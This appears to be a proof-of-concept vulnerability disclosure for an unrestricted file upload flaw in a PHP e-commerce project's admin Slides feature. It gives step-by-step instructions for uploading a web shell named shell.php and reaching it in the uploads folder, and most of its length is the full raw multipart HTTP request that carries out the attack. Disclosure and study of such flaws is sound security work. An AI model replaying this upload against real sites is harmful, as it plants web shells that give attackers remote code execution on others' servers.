# Full-Ecommece-Website-Slides-Unrestricted-File-Upload-RCE-POC # Author: D4rkP0w4r * Description => Upload web shell at Slides in admin panel # Step to Reproduct Login to admin -> Slides -> upload web shell -> Submit # Exploit * Upload web shell at Slides * When upload success access /Codes/kresources/uploads/shell.php * Web shell active # Vulnerable Code * No file checking before uploading # POC * Injection Point ------WebKitFormBoundaryape0IuRDSCQO1Rna Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream * Request POST /Full-Ecommece-Website/Codes/public/admin/index.php?slides HTTP/1.1 Host: localhost:8080 Content-Length: 178894 Cache-Control: max-age=0 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost:8080 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryape0IuRDSCQO1Rna User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:8080/Full-Ecommece-Website/Codes/public/admin/index.php?slides Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=p440fhd7svqid5f063i3epg29k Connection: close ------WebKitFormBoundaryape0IuRDSCQO1Rna Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream ------WebKitFormBoundaryape0IuRDSCQO1Rna Content-Disposition: form-data; name="slide_title" hacked ------WebKitFormBoundaryape0IuRDSCQO1Rna Content-Disposition: form-data; name="add_slide" Submit ------WebKitFormBoundaryape0IuRDSCQO1Rna-- * VIDEO POC https://drive.google.com/file/d/1SSBY92vfO1Q_Oska6mdpV9vuHmu0BVxk/view?usp=sharing